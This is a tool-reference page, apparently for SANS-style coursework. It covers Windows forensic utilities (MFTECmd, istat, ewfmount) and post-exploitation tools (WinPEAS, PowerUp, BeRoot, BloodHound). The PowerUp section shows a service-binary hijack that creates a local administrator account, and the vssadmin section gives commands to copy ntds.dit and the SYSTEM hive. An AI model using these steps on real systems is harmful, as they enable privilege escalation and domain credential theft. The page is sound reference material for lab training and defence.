MFTECmd

Description

A command-line tool for parsing the master file table.

Platform	Windows
Author	Eric Zimmerman
License	MIT License
URL	https://github.com/EricZimmerman/MFTECmd

Usage

MFTECmd version 0.4.4.6
 
Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/MFTECmd
 
        f               File to process ($MFT | $J | $LogFile | $Boot | $SDS). Required
 
        json            Directory to save JSON formatted results to. This or --csv required unless --de or --body is specified
        jsonf           File name to save JSON formatted results to. When present, overrides default name
        csv             Directory to save CSV formatted results to. This or --json required unless --de or --body is specified
        csvf            File name to save CSV formatted results to. When present, overrides default name
 
        body            Directory to save bodyfile formatted results to. --bdl is also required when using this option
        bodyf           File name to save body formatted results to. When present, overrides default name
        bdl             Drive letter (C, D, etc.) to use with bodyfile. Only the drive letter itself should be provided
        blf             When true, use LF vs CRLF for newlines. Default is FALSE
 
        dd              Directory to save exported FILE record. --do is also required when using this option
        do              Offset of the FILE record to dump as decimal or hex. Ex: 5120 or 0x1400 Use --de or --vl 1 to see offsets
 
        de              Dump full details for entry/sequence #. Format is 'Entry' or 'Entry-Seq' as decimal or hex. Example: 5, 624-5 or 0x270-0x5.
        fls             When true, displays contents of directory specified by --de. Ignored when --de points to a file.
        ds              Dump full details for Security Id as decimal or hex. Example: 624 or 0x270
 
        dt              The custom date/time format to use when displaying time stamps. Default is: yyyy-MM-dd HH:mm:ss.fffffff
        sn              Include DOS file name types. Default is FALSE
        at              When true, include all timestamps from 0x30 attribute vs only when they differ from 0x10. Default is FALSE
 
        vss             Process all Volume Shadow Copies that exist on drive specified by -f . Default is FALSE
        dedupe          Deduplicate -f & VSCs based on SHA-1. First file found wins. Default is FALSE
 
        debug           Show debug information during processing
        trace           Show trace information during processing
 
 
Examples: MFTECmd.exe -f "C:\Temp\SomeMFT" --csv "c:\temp\out" --csvf MyOutputFile.csv
          MFTECmd.exe -f "C:\Temp\SomeMFT" --csv "c:\temp\out"
          MFTECmd.exe -f "C:\Temp\SomeMFT" --json "c:\temp\jsonout"
          MFTECmd.exe -f "C:\Temp\SomeMFT" --body "c:\temp\bout" --bdl c
          MFTECmd.exe -f "C:\Temp\SomeMFT" --de 5-5
 
          Short options (single letter) are prefixed with a single dash. Long commands are prefixed with two dashes

Examples

mftecmd -f $j –csv <folder>

The following command will parse a UsnJournal and save the results in a CSV file:

G:\>mftecmd -f "C:\Users\SANSDFIR\Desktop\netwars\$J" --csv "C:\Users\SANSDFIR\Desktop\netwars"
MFTECmd version 0.4.4.6
 
Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/MFTECmd
 
Command line: -f C:\Users\SANSDFIR\Desktop\netwars\$J --csv C:\Users\SANSDFIR\Desktop\netwars
 
File type: UsnJournal
 
 
Processed 'C:\Users\SANSDFIR\Desktop\netwars\$J' in 1.4809 seconds
 
Usn entries found in 'C:\Users\SANSDFIR\Desktop\netwars\$J': 458,051
        CSV output will be saved to 'C:\Users\SANSDFIR\Desktop\netwars\20210803162237_MFTECmd_$J_Output.csv'

The following is a sample from the output file:

Blog Posts

istat

Description

Displays details of a meta-data structure (inode or MFT).

Platform	Linux and Windows
Author	Brian Carrier
License	Common Public License 1.0
URL	http://sleuthkit.org

Usage

usage: istat [-B num] [-f fstype] [-i imgtype] [-b dev_sector_size] [-o imgoffset] [-z zone] [-s seconds] [-vV] image inum
    -B num: force the display of NUM address of block pointers
    -z zone: time zone of original machine (i.e. EST5EDT or GMT)
    -s seconds: Time skew of original machine (in seconds)
    -i imgtype: The format of the image file (use '-i list' for supported types)
    -b dev_sector_size: The size (in bytes) of the device sectors
    -f fstype: File system type (use '-f list' for supported types)
    -o imgoffset: The offset of the file system in the image (in sectors)
    -v: verbose output to stderr
    -V: print version

Examples

istat <disk image> <entry number>

This example parses the $MFT in the provided image and displays data associated with entry number 48869:

root@siftworkstation:/home/sansforensics/netwars# istat ./romanoff/win7-32-nromanoff-c-drive.E01 48869
MFT Entry Header Values:
Entry: 48869        Sequence: 2
$LogFile Sequence Number: 8642056225
Allocated File
Links: 2
 
$STANDARD_INFORMATION Attribute Values:
Flags: Archive
Owner ID: 0
Security ID: 1723  (S-1-5-21-2036804247-3058324640-2116585241-1109)
Last User Journal Update Sequence Number: 1919383144
Created:        2011-08-28 22:33:18.571266300 (UTC)
File Modified:  2011-08-28 22:35:24.545830100 (UTC)
MFT Modified:   2012-04-04 15:21:06.753530300 (UTC)
Accessed:       2011-08-28 22:33:18.571266300 (UTC)
 
$FILE_NAME Attribute Values:
Flags: Archive
Name: adberdr813.exe
Parent MFT Entry: 42171         Sequence: 2
Allocated Size: 21807104        Actual Size: 21806256
Created:        2011-08-28 22:33:18.571266300 (UTC)
File Modified:  2011-08-28 22:33:28.007175500 (UTC)
MFT Modified:   2011-08-28 22:33:28.034520300 (UTC)
Accessed:       2011-08-28 22:33:18.571266300 (UTC)
 
Attributes:
Type: $STANDARD_INFORMATION (16-0)   Name: N/A   Resident   size: 72
Type: $FILE_NAME (48-7)   Name: N/A   Resident   size: 90
Type: $FILE_NAME (48-6)   Name: N/A   Resident   size: 94
Type: $DATA (128-4)   Name: N/A   Non-Resident   size: 21806256  init_size: 21806256
467370 467371 467372 467373 467374 467375 467376 467377
467378 467379 467380 467381 467382 467383 467384 467385
...
472690 472691 472692 472693
Type: $DATA (128-5)   Name: Zone.Identifier   Resident   size: 26

Blog Posts

FTK Imager

Description

FTK® Imager is a data preview and imaging tool that lets you quickly assess electronic evidence to determine if further analysis with a forensic tool such as Forensic Toolkit (FTK®) is warranted.

Platform	Windows
Author	AccessData Group
License
URL	https://www.exterro.com/ftk-imager#:~:text=FTK%C2%AE%20Imager%20is%20a,(FTK%C2%AE)%20is%20warranted.

Usage

Examples

Examining a disk image

File → Add Evidence Item
Image File → Next
Browse → Finish
Don’t forget to select the properties tab in the lower left corner

Blog Posts

ewfmount

Description

A command line tool for creating a mount file from a disk image. Use ewfmount to mount the EWF format (Expert Witness
Compression Format)

Platform	Linux
Author	Joachim Metz
License	GPLv3
URL	ewfmount.c

Usage

Usage: ewfmount [ -f format ] [ -X extended_options ] [ -hvV ]
                ewf_files mount_point
 
    ewf_files:   the first or the entire set of EWF segment files
 
    mount_point: the directory to serve as mount point
 
    -f:          specify the input format, options: raw (default),
                 files (restricted to logical volume files)
    -h:          shows this help
    -v:          verbose output to stderr
                 ewfmount will remain running in the foreground
    -V:          print version
    -X:          extended options to pass to sub system

Examples

ewfmount win7-32-nromanoff-c-drive.E01 /mnt/ewf_mount

This command creates a mount file.

root@siftworkstation:/home/sansforensics/netwars/romanoff# cd /mnt/ewf_mount
root@siftworkstation:/mnt/ewf_mount# ll
total 4
drwxr-xr-x  2 root root           0 Jan  1  1970 ./
drwxr-xr-x 23 root root        4096 Jul 25  2016 ../
-r--r--r--  1 root root 26578255872 Jul 24 17:54 ewf1

You can then mount it with this command:

root@siftworkstation:/mnt/ewf_mount# mount -o ro,loop,show_sys_files,streams_interface=windows ewf1 /mnt/romanoff/
root@siftworkstation:/mnt/ewf_mount# cd /mnt/romanoff/
root@siftworkstation:/mnt/romanoff# ll
total 3736025
drwxrwxrwx  1 root root       4096 Apr  4  2012 ./
drwxr-xr-x 24 root root       4096 Jul 24 17:55 ../
-rwxrwxrwx  1 root root       2560 Nov 10  2010 $AttrDef*
-rwxrwxrwx  1 root root         24 Jun 10  2009 autoexec.bat*
-rwxrwxrwx  1 root root          0 Nov 10  2010 $BadClus*
-rwxrwxrwx  1 root root     811104 Nov 10  2010 $Bitmap*
drwxrwxrwx  1 root root       8192 Sep 17  2011 Boot/
-rwxrwxrwx  1 root root       8192 Nov 10  2010 $Boot*
-rwxrwxrwx  1 root root     383786 Nov 20  2010 bootmgr*
-rwxrwxrwx  1 root root       8192 Nov 10  2010 BOOTSECT.BAK*
-rwxrwxrwx  1 root root         10 Jun 10  2009 config.sys*
lrwxrwxrwx  2 root root         60 Jul 14  2009 Documents and Settings -> /mnt/romanoff//Users/
drwxrwxrwx  1 root root          0 Nov 10  2010 $Extend/
-rwxrwxrwx  1 root root 1610211328 Apr  4  2012 hiberfil.sys*
-rwxrwxrwx  1 root root   67108864 Nov 10  2010 $LogFile*
-rwxrwxrwx  1 root root       4096 Nov 10  2010 $MFTMirr*
drwxrwxrwx  1 root root          0 Nov 10  2010 MSOCache/
-rwxrwxrwx  1 root root 2146951168 Apr  4  2012 pagefile.sys*
drwxrwxrwx  1 root root          0 Jul 14  2009 PerfLogs/
drwxrwxrwx  1 root root       4096 Aug 30  2011 ProgramData/
drwxrwxrwx  1 root root       8192 Mar 15  2012 Program Files/
drwxrwxrwx  1 root root          0 Nov 10  2010 Recovery/
drwxrwxrwx  1 root root       4096 Apr  4  2012 $Recycle.Bin/
----------  1 root root          0 Nov 10  2010 $Secure
drwxrwxrwx  1 root root       8192 Apr  4  2012 System Volume Information/
-rwxrwxrwx  1 root root     131072 Nov 10  2010 $UpCase*
drwxrwxrwx  1 root root       4096 Apr  3  2012 Users/
-rwxrwxrwx  1 root root          0 Nov 10  2010 $Volume*
drwxrwxrwx  1 root root      16384 Apr  4  2012 Windows/

Blog Posts

analyzeMFT.py

Description

This tool is designed to fully parse the MFT file from an NTFS filesystem
and present the results as accurately as possible in multiple formats.

Platform	Python
Author	David Kovar
License	Common Public License 1.0
URL	https://github.com/dkovar/analyzeMFT

Usage

Usage: analyzeMFT.py [options]
 
Options:
  -h, --help            show this help message and exit
  -v, --version         report version and exit
  -f FILE, --file=FILE  read MFT from FILE
  -o FILE, --output=FILE
                        write results to FILE
  -a, --anomaly         turn on anomaly detection
  -e, --excel           print date/time in Excel friendly format
  -b FILE, --bodyfile=FILE
                        write MAC information to bodyfile
  --bodystd             Use STD_INFO timestamps for body file rather than FN
                        timestamps
  --bodyfull            Use full path name + filename rather than just
                        filename
  -c FILE, --csvtimefile=FILE
                        write CSV format timeline file
  -l, --localtz         report times using local timezone
  -d, --debug           turn on debugging output
  -s, --saveinmemory    Save a copy of the decoded MFT in memory. Do not use
                        for very large MFTs
  -p, --progress        Show systematic progress reports.

Examples

Blog Posts

WinPEAS

Description

WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts.

Platform	Windows
Author	Carlos Polop
License	GPLv3
URL	https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS

Usage

domain               Enumerate domain information
systeminfo           Search system information
userinfo             Search user information
processinfo          Search processes information
servicesinfo         Search services information
applicationsinfo     Search installed applications information
networkinfo          Search network information
windowscreds         Search windows credentials
browserinfo          Search browser information
filesinfo            Search generic files that can contains credentials
fileanalysis         Search specific files that can contains credentials and for regexes inside files
eventsinfo           Display interesting events information

quiet                Do not print banner
notcolor             Don't use ansi colors (all white)
searchpf             Search credentials via regex also in Program Files folders
wait                 Wait for user input between checks
debug                Display debugging information - memory usage, method execution time
log[=logfile]        Log all output to file defined as logfile, or to "out.txt" if not specified
MaxRegexFileSize=1000000        Max file size (in Bytes) to search regex in. Default: 1000000B

Additional checks (slower):
-lolbas              Run additional LOLBAS check
-linpeas=[url]       Run additional linpeas.sh check for default WSL distribution, optionally provide custom linpeas.sh URL
                     (default: https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh)

Examples

Blog Posts

PowerUp

Description

PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

Platform	Windows
Author	Matthew Graeber
License	BSD 3-Clause
URL	PowerUp.ps1

Usage

Running Invoke-AllChecks will output any identifiable vulnerabilities along with specifications for any abuse functions. The -HTMLReport flag will also generate a COMPUTER.username.html version of the report.

Token/Privilege Enumeration/Abuse:

Get-ProcessTokenGroup               -   returns all SIDs that the current token context is a part of, whether they are disabled or not
Get-ProcessTokenPrivilege           -   returns all privileges for the current (or specified) process ID
Enable-Privilege                    -   enables a specific privilege for the current process

Service Enumeration/Abuse:

Test-ServiceDaclPermission          -   tests one or more passed services or service names against a given permission set
Get-UnquotedService                 -   returns services with unquoted paths that also have a space in the name
Get-ModifiableServiceFile           -   returns services where the current user can write to the service binary path or its config
Get-ModifiableService               -   returns services the current user can modify
Get-ServiceDetail                   -   returns detailed information about a specified service
Set-ServiceBinaryPath               -   sets the binary path for a service to a specified value
Invoke-ServiceAbuse                 -   modifies a vulnerable service to create a local admin or execute a custom command
Write-ServiceBinary                 -   writes out a patched C# service binary that adds a local admin or executes a custom command
Install-ServiceBinary               -   replaces a service binary with one that adds a local admin or executes a custom command
Restore-ServiceBinary               -   restores a replaced service binary with the original executable

DLL Hijacking:

Find-ProcessDLLHijack               -   finds potential DLL hijacking opportunities for currently running processes
Find-PathDLLHijack                  -   finds service %PATH% DLL hijacking opportunities
Write-HijackDll                     -   writes out a hijackable DLL

Registry Checks:

Get-RegistryAlwaysInstallElevated   -   checks if the AlwaysInstallElevated registry key is set
Get-RegistryAutoLogon               -   checks for Autologon credentials in the registry
Get-ModifiableRegistryAutoRun       -   checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns

Miscellaneous Checks:

Get-ModifiableScheduledTaskFile     -   find schtasks with modifiable target files
Get-UnattendedInstallFile           -   finds remaining unattended installation files
Get-Webconfig                       -   checks for any encrypted web.config strings
Get-ApplicationHost                 -   checks for encrypted application pool and virtual directory passwords
Get-SiteListPassword                -   retrieves the plaintext passwords for any found McAfee's SiteList.xml files
Get-CachedGPPPassword               -   checks for passwords in cached Group Policy Preferences files

Other Helpers/Meta-Functions:

Get-ModifiablePath                  -   tokenizes an input string and returns the files in it the current user can modify
Write-UserAddMSI                    -   write out a MSI installer that prompts for a user to be added
Invoke-WScriptUACBypass             -   performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe
Invoke-PrivescAudit                 -   runs all current escalation checks and returns a report (formerly Invoke-AllChecks)

Examples

getting started

This is how you invoke PowerUp in PowerShell for the first time.

PS C:\tools> import-module .\PowerUp.ps1
 
Security warning
Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your
computer. If you trust this script, use the Unblock-File cmdlet to allow the script to run without this warning
message. Do you want to run C:\tools\PowerUp.ps1?
[D] Do not run  [R] Run once  [S] Suspend  [?] Help (default is "D"): R

Invoke-AllChecks

This will run all the checks available in PowerUp.

PS C:\tools> Invoke-AllChecks
 
[*] Running Invoke-AllChecks
 
 
[*] Checking if user is in a local group with administrative privileges...
 
 
[*] Checking for unquoted service paths...
 
 
ServiceName    : Video Stream
Path           : C:\Program Files\VideoStream\1337 Log\checklog.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'Video Stream' -Path <HijackPath>
CanRestart     : False
 
ServiceName    : Video Stream
Path           : C:\Program Files\VideoStream\1337 Log\checklog.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'Video Stream' -Path <HijackPath>
CanRestart     : False
 
 
 
 
 
[*] Checking service executable and argument permissions...
 
 
ServiceName                     : edgeupdate
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdate'
CanRestart                      : False
 
ServiceName                     : edgeupdate
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Synchronize, AppendData/AddSubdirectory}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdate'
CanRestart                      : False
 
ServiceName                     : edgeupdatem
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart                      : False
 
ServiceName                     : edgeupdatem
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Synchronize, AppendData/AddSubdirectory}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart                      : False
 
ServiceName                     : gupdate
Path                            : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'gupdate'
CanRestart                      : False
 
ServiceName                     : gupdate
Path                            : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Synchronize, AppendData/AddSubdirectory}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'gupdate'
CanRestart                      : False
 
ServiceName                     : gupdatem
Path                            : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'gupdatem'
CanRestart                      : False
 
ServiceName                     : gupdatem
Path                            : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Synchronize, AppendData/AddSubdirectory}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'gupdatem'
CanRestart                      : False
 
ServiceName                     : neo4j
Path                            : C:\Tools\neo4j\bin\tools\prunsrv-amd64.exe //RS//neo4j
ModifiableFile                  : C:\Tools\neo4j\bin\tools\prunsrv-amd64.exe
ModifiableFilePermissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'neo4j'
CanRestart                      : False
 
ServiceName                     : Video Stream
Path                            : C:\Program Files\VideoStream\1337 Log\checklog.exe
ModifiableFile                  : C:\Program Files\VideoStream\1337 Log\checklog.exe
ModifiableFilePermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : BUILTIN\Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'Video Stream'
CanRestart                      : False
 
 
 
 
 
[*] Checking service permissions...
 
 
[*] Checking %PATH% for potentially hijackable DLL locations...
 
 
ModifiablePath    : C:\Python27\
IdentityReference : NT AUTHORITY\Authenticated Users
Permissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
%PATH%            : C:\Python27\
AbuseFunction     : Write-HijackDll -DllPath 'C:\Python27\\wlbsctrl.dll'
 
ModifiablePath    : C:\Python27\Scripts
IdentityReference : NT AUTHORITY\Authenticated Users
Permissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
%PATH%            : C:\Python27\Scripts
AbuseFunction     : Write-HijackDll -DllPath 'C:\Python27\Scripts\wlbsctrl.dll'
 
ModifiablePath    : C:\Tools
IdentityReference : NT AUTHORITY\Authenticated Users
Permissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
%PATH%            : C:\Tools\SysinternalsSuite
AbuseFunction     : Write-HijackDll -DllPath 'C:\Tools\wlbsctrl.dll'
 
ModifiablePath    : C:\Users\notadmin\AppData\Local\Microsoft\WindowsApps
IdentityReference : SEC560STUDENT\notadmin
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\notadmin\AppData\Local\Microsoft\WindowsApps
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\notadmin\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
 
 
 
 
 
[*] Checking for AlwaysInstallElevated registry key...
 
 
[*] Checking for Autologon credentials in registry...
 
 
[*] Checking for modifidable registry autoruns and configs...
 
 
[*] Checking for modifiable schtask files/configs...
 
 
[*] Checking for unattended install files...
 
 
[*] Checking for encrypted web.config strings...
 
 
[*] Checking for encrypted application pool and virtual directory passwords...
 
 
[*] Checking for plaintext passwords in McAfee SiteList.xml files....
 
 
 
 
[*] Checking for cached Group Policy Preferences .xml files....

Write-ServiceBinary -ServiceName ‘<service name>’ -Path ‘<vulnerable path>’

This command will write the vulnerable path identified in the previous command to the registry entry of the vulnerable service.

PS C:\tools> Write-ServiceBinary -ServiceName 'Video Stream' -Path 'C:\Program Files\VideoStream\1337.exe'
 
ServiceName  Path                                  Command
-----------  ----                                  -------
Video Stream C:\Program Files\VideoStream\1337.exe net user john Password123! /add && timeout /t 5 && net localgroup Administrators john /add

Blog Posts

BloodHound

Description

BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. As of version 4.0, BloodHound now also supports Azure. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment.

Platform	All
Author	@_wald0, @CptJesus, and @harmj0y
License	GPLv3
URL	https://github.com/BloodHoundAD/BloodHound

Usage

https://bloodhound.readthedocs.io/en/latest/index.html

Examples

Graph path from specific user to domain admin

This example shows the path from the ‘yfan_a’ account to the domain admin, by searching using a starting node and ending node (like google maps).

Shortest path to domain admin

This pre-built query shows the shortest path to get domain admin without specifying a starting point.

Blog Posts

beRoot

Description

BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.

Platform	All
Author	AlessandroZ
License	?
URL	https://github.com/AlessandroZ/BeRoot

Usage

Windows:

|====================================================================|
|                                                                    |
|                    Windows Privilege Escalation                    |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|====================================================================|
 
 
usage: beRoot [-h] [-l] [-w] [-c CMD]
 
Windows Privilege Escalation
 
optional arguments:
  -h, --help         show this help message and exit
  -l, --list         list all softwares installed (not run by default)
  -w, --write        write output
  -c CMD, --cmd CMD  cmd to execute for the webclient check (default: whoami)

Linux:

|====================================================================|
|                                                                    |
|                      Linux Privilege Escalation                    |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|====================================================================|

Examples

beRoot (on Windows)

This is the default output of beRoot when run with no other arguments.

|====================================================================|
|                                                                    |
|                    Windows Privilege Escalation                    |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|====================================================================|
 
 
 
################ Service ################
 
[!] Permission to create a service with openscmanager
True
 
[!] Path containing spaces without quotes
permissions: {'change_config': False, 'start': False, 'stop': False}
Name: Video Stream
Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Video Stream
Full path: C:\Program Files\VideoStream\1337 Log\checklog.exe
Writables path found:
        - C:\
        - C:\Program Files\VideoStream
 
 
[!] Binary located on a writable directory
Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AarSvc
Full path: C:\WINDOWS\system32\svchost.exe -k AarSvcGroup -p
Writable directory: C:\WINDOWS\system32
Name: AarSvc
 
permissions: {'change_config': False, 'start': False, 'stop': False}
Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AarSvc_1df1243
Full path: C:\WINDOWS\system32\svchost.exe -k AarSvcGroup -p
Writable directory: C:\WINDOWS\system32
Name: AarSvc_1df1243
 
permissions: {'change_config': False, 'start': False, 'stop': False}
Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AJRouter
Full path: C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted -p
Writable directory: C:\WINDOWS\system32
Name: AJRouter
 
permissions: {'change_config': False, 'start': False, 'stop': False}
Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ALG
Full path: C:\WINDOWS\System32\alg.exe
Writable directory: C:\WINDOWS\System32
Name: ALG
...
permissions: {'change_config': False, 'start': False, 'stop': False}
Name: Sense
Writable directory: C:\Program Files\Windows Defender Advanced Threat Protection
Full path: "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"
 
 
 
################ Startup Keys ################
 
[!] Registry key with writable access
HKEY_LOCAL_MACHINE\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
 
[!] Binary located on a writable directory
Name: SecurityHealth
Key: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
Writable directory: C:\WINDOWS\system32
Full path: %windir%\system32\SecurityHealthSystray.exe
 
Name: VMware User Process
Key: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
Writable directory: C:\Program Files\VMware\VMware Tools
Full path: "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
 
 
 
################ Taskscheduler ################
 
[!] Permission to write on the task directory: c:\windows\system32\tasks
True
 
-------------- Get System Priv with WebClient --------------
 
[!] Checking WebClient vulnerability
 
################ Error on: check_webclient ################
Traceback (most recent call last):
  File "beroot\run_checks.py", line 315, in check_all
  File "beroot\run_checks.py", line 277, in check_webclient
  File "beroot\modules\checks\webclient\webclient.py", line 206, in run
  File "beroot\modules\checks\webclient\webclient.py", line 101, in startWebclient
ValueError: Procedure probably called with not enough arguments (4 bytes missing)
 
 
[!] Elapsed time = 0.729000091553

Additional Details

beroot-1

Blog Posts

vssadmin

⚠ Only present on Domain Controllers

Description

The Windows Volume Shadow Service. It can be use to make copies of files that are currently in use (including ntds.dit).

Platform	Windows
Author	Microsoft
License	Windows
URL	vssadmin

Usage

vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
 
---- Commands Supported ----
 
Delete Shadows        - Delete volume shadow copies
List Providers        - List registered volume shadow copy providers
List Shadows          - List existing volume shadow copies
List ShadowStorage    - List volume shadow copy storage associations
List Volumes          - List volumes eligible for shadow copies
List Writers          - List subscribed volume shadow copy writers
Resize ShadowStorage  - Resize a volume shadow copy storage association

Examples

vssadmin list shadows

This will list any existing shadow copies.

C:\WINDOWS\system32>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
 
Contents of shadow copy set ID: {34e68305-975f-4d17-8655-4993d495a4e7}
   Contained 1 shadow copies at creation time: 3/17/2022 5:14:25 PM
      Shadow Copy ID: {670f6106-3968-4656-a8cc-a822f2222719}
         Original Volume: (C:)\\?\Volume{f99d1339-fef8-4d0c-92f0-df3a6876270d}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: DESKTOP-TI18DM9
         Service Machine: DESKTOP-TI18DM9
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessibleWriters
         Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered

You can then copy files from the shadow volume, like ntds.dit for example.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\windows\temp\ntds.dit

Then you need to copy the SYSTEM hive to get the encryption key.

reg save hklm\system C:\windows\temp\system /y

vssadmin create shadow /for=c:

This will create a new shadow copy of the C drive. Alternatively, you can run this command in Powershell.

(gwmi -list win32_shadowcopy).Create('C:\','ClientAccessible')

Blog Posts

Tag: windows tools